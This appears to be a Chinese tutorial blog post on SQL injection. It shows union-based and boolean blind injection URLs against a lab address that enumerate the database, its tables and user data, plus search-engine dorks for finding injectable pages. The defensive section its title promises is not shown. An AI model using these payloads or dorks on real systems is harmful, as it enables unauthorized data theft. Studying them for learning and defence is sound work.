sql注入学习与防护
一、SQL注入分类
SQL注入根据攻击方式的不同,可以分为以下几种类型:
- 数字型注入
- 字符型注入
- 报错注入
- 布尔盲注
- 时间盲注
- 联合查询注入
- 基于堆叠的查询注入
二、SQL注入流程
- 发现注入点
- 猜测字段数
- 确定显示字段
- 获取数据库信息
- 获取数据库中的表
- 获取表中的字段
- 获取字段中的数据
例子:
获取数据库名参考
-
字符限制:数据库的名字可以包含字母、数字、下划线和美元符号(
$)。但是,名字不能以数字开头。 -
大小写敏感性:在Windows系统上,MySQL数据库的名字默认是不区分大小写的。但在大多数Unix/Linux系统上,数据库的名字是区分大小写的。为了确保跨平台的兼容性,建议使用小写字母。
-
长度限制:数据库的名字最大长度为64个字符。
1.发现网站请求为get,如果存在注入点这里不会报错
http://192.168.10.111/news/show.php?id=-1 and 1=12.发现注入点后猜字段,逐一尝试猜测字段数
http://192.168.10.111/news/show.php?id=-1 order by 16
-- order by x 根据第x个字段排序,如果出现报错说明字段不存在3.发现不报错出现,并且出现的数值,为显示字段
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,154.脱库
//获取当前数据库
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15//获取数据库中的表,hex的作用是因为拼接后的字符串有‘,’会混淆
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(table_name))
,12,13,14,15 from information_schema.tables where table_schema='news'//获取表中的字段
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(column_name))
,12,13,14,15 from information_schema.columns where table_schema='news' and table_name='news_users
三、sql盲注:
构造真或者假的问题对数据库进行提问
寻找sql注入点
1.在url后添加 ’ 如果报错说明有注入点
2.对数值型注入点可以进行减法
3.对在url后添加 and 1=2 如果没有正常显示,说明有注入点
例子:
-- 猜测数据库长度
http://192.168.10.111/news/show.php?id=46 and length(database())=4-- 或取当前数据库第二个字符
http://192.168.10.111/news/show.php?id=46 and substr(database(),2,1)='e'-- 获取news数据库中所有表名长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(table_name)
from information_schema.tables where table_schema='news'))=98-- 获取表名字符串第一个字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(table_name)
from information_schema.tables where table_schema='news'),1,1)='n'-- 获取news库,news_users表中字段字符串的字符串长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(column_name)
from information_schema.columns where table_schema='news' and table_name='news_users'))=24-- 获取字段第一个字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(column_name)
from information_schema.columns where table_schema='news' and table_name='news_users'),1,1)='u'-- 获取username字段中的信息长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(username) from
news.news_users))=5-- 获取username字段的字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(username) fromnews.news_users),2,1)='d'
注:查找网站资源可使用hacking语法
inurl:?id= url中存在:?id=
Intitle:admin title中存在:admin
filetype:txt 查找网站中txt文件
site:www.baidu.com 在百度中查找
相关文章:
sql注入学习与防护
一、SQL注入分类 SQL注入根据攻击方式的不同,可以分为以下几种类型: 数字型注入字符型注入报错注入布尔盲注时间盲注联合查询注入基于堆叠的查询注入 二、SQL注入流程 发现注入点猜测字段数确定显示字段获取数据库信息获取数据库中的表获取表中的字段获…...
饥荒dst联机服务器搭建基于Ubuntu
目录 一、服务器配置选择 二、项目 1、下载到服务器 2、解压 3、环境 4、启动面板 一、服务器配置选择 首先服务器配置需要2核心4G,4G内存森林加洞穴大概就占75% 之后进行服务器端口的开放: tcp:8082 tcp:8080 UDP:10888 UDP:10998 UDP:10999 共…...
AtCoder Beginner Contest 363
A - Piling Up 题意 不同的分数段有不同的^数量,Takahashi想要使得他的^数量增加,问他所需要的最少分数增幅。 思路 我们只需要找到下一阶段的下限。 a / 100 是本阶段 1 变成下一阶段,再 * 100变成下限,再与原来的相减即可…...
)
Protel DXP 面试题详解及参考答案(4万字长文)
解释Protel DXP的基本工作流程。 Protel DXP(现已更名为Altium Designer)是一款用于电子设计自动化(EDA)的软件,主要应用于印刷电路板(PCB)设计。其基本工作流程通常包括以下几个阶段: 项目创建与配置: 开始一个新的设计项目时,首先需要创建一个项目文件,在这个文件…...
雪花算法 集群uid重复问题 uid-generator-spring-boot-starter
1、在生成环境 在某个业务使用该插件生成uid,由于业务整合了 mybatis-plus模块 2、该业务是分部署集群部署以及使用的多线程获取uid,使用中发现唯一建冲突,生成的uid有重复。 然后查看日志发现 workerId 始终为0 怀疑是生成workerId出了问题。 查看跟…...
【AutoDL】AutoDL+Xftp+Xshell+VSCode配合使用教程
身边没有显卡资源或不足以训练模型时,可以租赁服务器的显卡。 1、AutoDL Step :注册账号->选择显卡->选择环境->开机启动 1.1 首先打开AutoDL官网,注册账号 1.2 租赁自己想要的显卡资源 1.3 选择基础环境。 此处,我们让其自动配置…...
使用minio cllient(mc)完成不同服务器的minio的数据迁移和mc基本操作
minio client 前言使用1.拉取minio client 镜像2.部署mc容器3.添加云存储服务器4.迁移数据1.全量迁移2.只迁移某个桶3.覆盖重名文件 5.其他操作1.列出所有alias、列出列出桶中的文件和目录1.1.列出所有alias1.2.列出桶中的文件和目录 2.创建桶、删除桶2.1.创建桶2.2.删除桶 3.删…...
Vue3分段控制器(Segmented)
效果如下图:在线预览 APIs Segmented 参数说明类型默认值必传block是否将宽度调整为父元素宽度,同时所有选项占据相同的宽度booleanfalsefalsedisabled是否禁用booleanfalsefalseoptions选项数据string[] | number[] | SegmentedOption[][]falsesize控…...
SpringSecurity如何正确的设置白名单
在SpringSecurity中,往往需要对部分接口白名单访问,而大部分在使用Security中就有一个误区,那就是免鉴权访问和白名单的区别。 大部分的Security文章包括官方文档给出免鉴权访问都是使用.permitAll()去对相应路径进行免鉴权访问,但实际上这仅仅只表示该资源不需要相应的权限访问…...
【Langchain大语言模型开发教程】评估
🔗 LangChain for LLM Application Development - DeepLearning.AI 学习目标 1、Example generation 2、Manual evaluation and debug 3、LLM-assisted evaluation 4、LangChain evaluation platform 1、引包、加载环境变量; import osfrom dotenv imp…...
Python爬虫小项目实战
1.自动获取小说多个章节内容 2.获取英雄联盟里面的全部英雄 3. 简单地自动抽奖系统 4. 简单地点赞系统 5. 制作查询手机号工具 6. 制做登录系统 7. 操作excel办公自动化 8. 自动批量保存图片 9. 获取NBA数据 10. 获取彩票信息 11. 获取房地产信息 12. 获取小说…...
PHP Filesystem 简介
PHP Filesystem 简介 PHP 是一种广泛使用的开源服务器端脚本语言,特别适用于网页开发。在 PHP 中,Filesystem 是一个功能丰富的库,提供了一系列用于文件系统操作的函数。这些函数允许开发者读取、写入、修改和删除文件和目录,以及执行其他与文件系统相关的任务。 PHP Fil…...
源代码加密软件哪家好?五款企业级加密软件推荐
随着软件开发行业的快速发展,源代码作为核心资产,面临着越来越大的安全威胁。保护源代码不被泄露或盗用,是每个开发团队和企业都需要高度重视的问题。源代码加密软件通过对代码进行加密处理,确保其在传输和存储过程中保持机密性。…...
Redis常见的数据类型及操作方式
一、通用命令 1)获取redis中所有key keys * 2)删除一个或多个key del key1 key2 ... 3)判断key是否存在 exists key 4)给key添加过期时间 expire key time 5)查看key剩余过期时间 ttl key 6) 查看redis内存…...
谷粒商城实战笔记-55-商品服务-API-三级分类-修改-拖拽数据收集
文章目录 一,拖拽后结点的parentCid的更新二,拖拽后结点的父节点下所有结点的sort排序属性的变化更新排序的逻辑代码分析 三,拖拽后结点及其子节点catLevel的变化判断是否需要更新 catLevel获取拖动后的新节点 更新 catLevel完整代码 这一节的…...
AI绘画入门实践|Midjourney:使用 --seed 制作情侣头像与漫画
在 Midjourney 中,seed 是指一个种子,用于生成图像时的起点或基础。 使用格式:--seed 获取的seed值 获取 seed 值 使用 seed 生成图像 a cute boys avatar, background with blue sky and white cloud, Ghibli Studio style, Hayao Miyazaki…...
笔记:Enum中FlagsAttribute特性的用法
一、目的:分享Enum中FlagsAttribute特性的用法 在C#中,Enum(枚举)类型可以使用[Flags]属性来表示一个枚举可以存储多个值。这是通过按位运算符(如|(或)和&(与)&#…...
QWidget如何切换ui
在Qt中,QWidget及其子类用于构建图形用户界面。如果你想要在不同的UI之间切换,可以使用QStackedWidget,它可以管理一组QWidget,并且每次只显示其中一个。 以下是一个简单的例子,展示如何使用QStackedWidget切换UI&…...
web网站组成
web网站由四部分组成:浏览器 前端服务器 后端服务器 数据库服务器 流程: 1.浏览器输入网站后,向前端服务器发送请求,前端服务器响应,静态的数据给浏览器。 2.前端代码中script中有url,这个是向后台发送请求的网…...
带您详细了解安全漏洞的产生和防护
什么是漏洞? 漏洞是 IT、网络、云、Web 或移动应用程序系统中的弱点或缺陷,可能使其容易受到成功的外部攻击。攻击者经常试图寻找网络安全中的各种类型的漏洞来组合和利用系统。 一些最常见的漏洞: 1.SQL注入 注入诸如 SQL 查询之类的小代…...
服务器风扇静音改造:揭秘线序定义的通用破解技巧——以IBM SystemX 3630 M4为案例
1. 为什么服务器风扇这么吵? 服务器风扇的噪音问题困扰着很多运维人员和家庭实验室用户。我拆解过几十台不同品牌的服务器,发现这个问题的根源在于服务器的散热设计理念与家用电脑完全不同。 服务器在设计时优先考虑的是稳定性和散热效率,而不…...
Anything V5图像生成效果实测:高清画质与丰富风格展示
Anything V5图像生成效果实测:高清画质与丰富风格展示 1. 引言:惊艳的二次元创作体验 1.1 模型核心能力概述 Anything V5作为Stable Diffusion生态中的明星模型,专为动漫风格图像生成优化。经过大规模高质量二次元数据训练,它能…...
SMUDebugTool:16核心独立调节与实时硬件监控的锐龙平台性能优化工具
SMUDebugTool:16核心独立调节与实时硬件监控的锐龙平台性能优化工具 【免费下载链接】SMUDebugTool A dedicated tool to help write/read various parameters of Ryzen-based systems, such as manual overclock, SMU, PCI, CPUID, MSR and Power Table. 项目地址…...
告别繁琐配置:用快马ai一键生成win10系统openclaw自动化安装脚本原型
最近在折腾一个自动化安装OpenClaw工具的项目,发现Windows 10下的环境配置特别麻烦。作为一个经常需要快速验证工具链的开发者,我摸索出了一套用InsCode(快马)平台快速生成原型的方法,分享给大家。 环境检测模块的实现 最头疼的就是处理不同用…...
Java Web 新冠物资管理系统系统源码-SpringBoot2+Vue3+MyBatis-Plus+MySQL8.0【含文档】
摘要 新冠疫情的爆发对全球公共卫生体系提出了严峻挑战,物资管理成为疫情防控中的关键环节。传统物资管理方式依赖人工操作,效率低下且易出错,难以应对突发公共卫生事件中的大规模物资调配需求。为解决这一问题,新冠物资管理系统应…...
SDMatte高可用集群部署:基于Kubernetes的弹性伸缩方案
SDMatte高可用集群部署:基于Kubernetes的弹性伸缩方案 1. 为什么需要高可用部署方案 电商大促期间,某美妆品牌突然发现他们的AI抠图服务崩溃了——每秒上千张的商品图等待处理,但单机部署的服务早已不堪重负。这种场景在企业级AI应用部署中…...
图像分割损失函数调参指南:如何用Focal Loss拯救你的小目标检测模型
图像分割损失函数调参指南:如何用Focal Loss拯救你的小目标检测模型 当你在处理卫星图像中的微小建筑物或显微图像里的稀有细胞时,是否经常遇到模型对前景目标"视而不见"的情况?传统交叉熵损失在面对这种极端类别不平衡时往往力不从…...
SecGPT-14B实战手册:Chainlit中集成Markdown渲染与代码块语法高亮
SecGPT-14B实战手册:Chainlit中集成Markdown渲染与代码块语法高亮 1. SecGPT-14B简介 SecGPT是由云起无垠推出的开源大语言模型,专门针对网络安全领域优化。该模型基于先进的自然语言处理技术,能够理解和生成与网络安全相关的专业内容。 S…...
BootstrapBlazor滑块组件:如何实现垂直方向滑动控制
BootstrapBlazor滑块组件:如何实现垂直方向滑动控制 【免费下载链接】BootstrapBlazor 项目地址: https://gitcode.com/gh_mirrors/bo/BootstrapBlazor BootstrapBlazor滑块组件为Blazor开发者提供了强大的数值输入控件,而垂直方向滑块则是构建现…...
Llama-3.2V-11B-cot镜像免配置:内置模型加载进度条与超时重试机制
Llama-3.2V-11B-cot镜像免配置:内置模型加载进度条与超时重试机制 1. 项目概述 Llama-3.2V-11B-cot是基于Meta Llama-3.2V-11B-cot多模态大模型开发的高性能视觉推理工具,专为双卡4090环境深度优化。这个工具解决了传统大模型部署中的多个痛点…...